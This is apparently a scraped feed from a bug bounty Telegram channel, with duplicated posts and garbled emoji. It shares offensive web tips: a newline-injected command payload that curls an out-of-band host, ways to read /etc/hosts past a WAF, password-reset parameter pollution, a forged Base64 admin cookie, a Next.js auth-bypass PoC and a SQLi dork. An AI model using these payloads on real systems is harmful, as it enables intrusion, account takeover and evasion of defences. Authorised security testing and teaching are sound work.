A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Client-IP.
https://github.com/ifconfig-me/SQLi-Scanner
π28π₯7β€3π€2
CVE-2025-22457: RCE in Ivanti Connect Secure, 9.0 rating π₯
A buffer overflow in Ivanti Connect Secure allows an unauthenticated attacker to perform remote code execution.
Search at Netlas.io:
π Link: https://nt.ls/zsWig
π Dork: http.body:"welcome.cgi?p=logo"
Vendor's advisory: https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US
A buffer overflow in Ivanti Connect Secure allows an unauthenticated attacker to perform remote code execution.
Search at Netlas.io:
π Link: https://nt.ls/zsWig
π Dork: http.body:"welcome.cgi?p=logo"
Vendor's advisory: https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US
β€5π3
π₯ Web Pentesting & Bug Bounty Batch β Starting April!
Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.
β Weekday & Weekend Batches β Evening Slots (IST)
β Hands-on Labs & Live Automations
β Bug Bounty Methodologies & Practical Hunting
β Community Support & Private POC Access
π© Limited slots! Enroll now and take your hacking skills to the next level.
π± DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.
β Weekday & Weekend Batches β Evening Slots (IST)
β Hands-on Labs & Live Automations
β Bug Bounty Methodologies & Practical Hunting
β Community Support & Private POC Access
π© Limited slots! Enroll now and take your hacking skills to the next level.
π± DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
π5β€1
https://github.com/musana/CF-Hero
Please open Telegram to view this post
VIEW IN TELEGRAM
β€11π₯8πΏ4
domains.txt
836.9 KB
πDownload all bug bounty programs domains in scope items π―
πGet a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more β all in one place!π₯
ππΌStep 1: Download the domains.txt file
πstep 2: Extract only main/root domains
`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`
πStep 3: Extract all IP addresses:
`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`
Don't forget to give reactionsβ€οΈ
πGet a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more β all in one place!π₯
ππΌStep 1: Download the domains.txt file
πstep 2: Extract only main/root domains
`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`
πStep 3: Extract all IP addresses:
`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`
Don't forget to give reactionsβ€οΈ
π₯27π12β€11
π₯Top 25 Bug Bounty Platform π°
01. Bugcrowd
02. HackerOne
03. Intigriti
04. YesWeHack
05. Synack, Inc.
06. HackenProof | Web3 bug bounty platform
07. Open Bug Bounty
08. Immunefi
09. Cobalt
10. Zerocopter
11. Yogosha
12. SafeHats
13. Vulnerability Research Labs, LLC
14. AntiHACKme Pte Ltd
15. RedStorm Information Security
16. Cyber Army Indonesia
17. Hacktrophy
18. Nordic Defender
19. Capture The Bug
20. Bugbounter
21. Detectify
22. BugBase
23. huntr
24. Pentabug
25. SecureBug
Happy Hunt β€οΈ
01. Bugcrowd
02. HackerOne
03. Intigriti
04. YesWeHack
05. Synack, Inc.
06. HackenProof | Web3 bug bounty platform
07. Open Bug Bounty
08. Immunefi
09. Cobalt
10. Zerocopter
11. Yogosha
12. SafeHats
13. Vulnerability Research Labs, LLC
14. AntiHACKme Pte Ltd
15. RedStorm Information Security
16. Cyber Army Indonesia
17. Hacktrophy
18. Nordic Defender
19. Capture The Bug
20. Bugbounter
21. Detectify
22. BugBase
23. huntr
24. Pentabug
25. SecureBug
Happy Hunt β€οΈ
π₯23π7β€1
π₯Never forget to check for blind RCE!π₯
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE β still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline β URL encoded)
And boom β Blind RCE triggered! My server got the hit instantly.
Cybersecurity isnβt about effort β itβs about mindset. Deep thinking always wins over brute force.β€οΈ
DarkShadow
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE β still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline β URL encoded)
And boom β Blind RCE triggered! My server got the hit instantly.
Cybersecurity isnβt about effort β itβs about mindset. Deep thinking always wins over brute force.β€οΈ
DarkShadow
β€34π9π₯7π³3
π₯You can findπ₯
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)π§π
target.com/hidden this page required authentication or redirect to /login page.
Try: target.com/login/hidden
OMG! Auth bypass β
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)π§π
target.com/hidden this page required authentication or redirect to /login page.
Try: target.com/login/hidden
OMG! Auth bypass β
π19π€12β€7π₯3
Password Reset Bypass Trick π
Some poorly secured endpoints accept multiple email parameters.π³
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emailsβ¦ youβre in.β‘
Now imagine if the victim is an admin β hello dashboard, hello bounty!π°
#bugbountytips
Some poorly secured endpoints accept multiple email parameters.π³
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emailsβ¦ youβre in.β‘
Now imagine if the victim is an admin β hello dashboard, hello bounty!π°
#bugbountytips
π28β€9π¨βπ»6π₯1π€1π1π³1
Recently disclosed hackerone critical bug, which can exploitable under few minutes!
POC:
GET /reports/***.json HTTP/2
Host: hackerone.com
If you all guys interested to know simple and Smart tricks β never forget to react β€οΈ
POC:
GET /reports/***.json HTTP/2
Host: hackerone.com
If you all guys interested to know simple and Smart tricks β never forget to react β€οΈ
β€77π16πΏ11π₯5π2
A simple hunt can flip the whole game!π
While testing a web app, I noticed this suspicious-looking session cookie:
I quickly ran it through Base64 decoding:
Wow π³ β it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...
I modified the role from user to admin:
Then replaced the cookie:
BOOM π₯ Instantly, we got admin access!π₯
Follow me ππΌ ...DarkShadow...
While testing a web app, I noticed this suspicious-looking session cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==I quickly ran it through Base64 decoding:
echo "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==" | base64 -d
{user:darkshadow,role:user}
Wow π³ β it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...
I modified the role from user to admin:
echo "{user:darkshadow,role:admin}" | base64
e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
Then replaced the cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=BOOM π₯ Instantly, we got admin access!π₯
Follow me ππΌ ...DarkShadow...
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π13π₯10π3
π€«Everyone Let's dive deep into the art of WAF bypass techniques β a must-know skill for every serious bug bounty hunter.β‘
β‘Bypass Series for bug huntersπ
Part-1
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
Follow meππΌ DarkShadow
#Bugbountytips #series
β‘Bypass Series for bug huntersπ
Part-1
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tac /etc/hosts - π§ββοΈ man /etc/hosts - πnl /etc/hosts - π€―less /etc/hosts - π€«more /etc/hosts - πstrings /etc/hosts - πtail /etc/hosts - π
head /etc/hosts -π₯±Follow meππΌ DarkShadow
#Bugbountytips #series
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯21β€6π4
This media is not supported in your browser
VIEW IN TELEGRAM
π€£17π6π1
β‘Bypass Series for bug huntersπ
Part-2
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
perl -pe '' /etc/hosts
Follow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-2
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
xxd -p /etc/hosts | xxd -p -rxargs -d '\n' -I{} echo {} < /etc/hostsperl -pe '' /etc/hosts
sed '' /etc/hostsawk '{print}' /etc/hostsdd if=/etc/hosts 2>/dev/nullFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯17π6
π₯With the right dork, the whole game changesβrecon becomes domination.π
Dork:
For more followππΌ DarkShadow
#bugbountytips
Dork:
inurl:search.php inurl:sqlQuery inurl:&For more followππΌ DarkShadow
#bugbountytips
π17π₯5β€1π1π³1
π This is wild!
Youβve probably seen the buzz around the Next.js middleware auth bypass (CVE-2025-29927) β but thereβs another less-known yet similar vulnerability: CVE-2024-51479.
This flaw allows attackers to bypass authentication by abusing the __nextLocale query parameter in the URL, tricking the middleware into granting access to protected routes.
Proof of Concept (PoC):
This vulnerability was fixed in Next.js v14.2.15, and Vercel-hosted apps have already been patched automatically.
I found a very cool article explaining everything in detail:
https://gmo-cybersecurity.com/blog/another-nextjs-middleware-bypass-en
Youβve probably seen the buzz around the Next.js middleware auth bypass (CVE-2025-29927) β but thereβs another less-known yet similar vulnerability: CVE-2024-51479.
This flaw allows attackers to bypass authentication by abusing the __nextLocale query parameter in the URL, tricking the middleware into granting access to protected routes.
Proof of Concept (PoC):
curl https://target.com/?__nextLocale=/adminThis vulnerability was fixed in Next.js v14.2.15, and Vercel-hosted apps have already been patched automatically.
I found a very cool article explaining everything in detail:
π8β€5π₯5π3π«‘1
This media is not supported in your browser
VIEW IN TELEGRAM
π New Script Alert β Subdomain Monitoring (Coming Soon!)
from Brut Security
For those whoβve been waiting on a simple and efficient way to monitor subdomains automatically β your wait is almost over. π
Weβve been working on a Bash script that:
β Monitors your target domains every 6 hours
β Uses subfinder, anew, and notify
β Sends actual new subdomains as file attachments directly to your Discord webhook
β Clean, lightweight & made for practical usage in recon and bug bounty
The release isnβt today β dropping next week, but thought Iβd give you all a heads-up.
If youβre into bug hunting, automation, or OSINT β this might be super useful for your workflow.
π Share with your team
β€οΈ React if youβre excited
Letβs get the word out before the launch!
#BrutSecurity #bugbounty #subdomainmonitoring #infosec #recon #bashscript #automation
from Brut Security
For those whoβve been waiting on a simple and efficient way to monitor subdomains automatically β your wait is almost over. π
Weβve been working on a Bash script that:
β Monitors your target domains every 6 hours
β Uses subfinder, anew, and notify
β Sends actual new subdomains as file attachments directly to your Discord webhook
β Clean, lightweight & made for practical usage in recon and bug bounty
The release isnβt today β dropping next week, but thought Iβd give you all a heads-up.
If youβre into bug hunting, automation, or OSINT β this might be super useful for your workflow.
π Share with your team
β€οΈ React if youβre excited
Letβs get the word out before the launch!
#BrutSecurity #bugbounty #subdomainmonitoring #infosec #recon #bashscript #automation
21β€30π6π₯4π2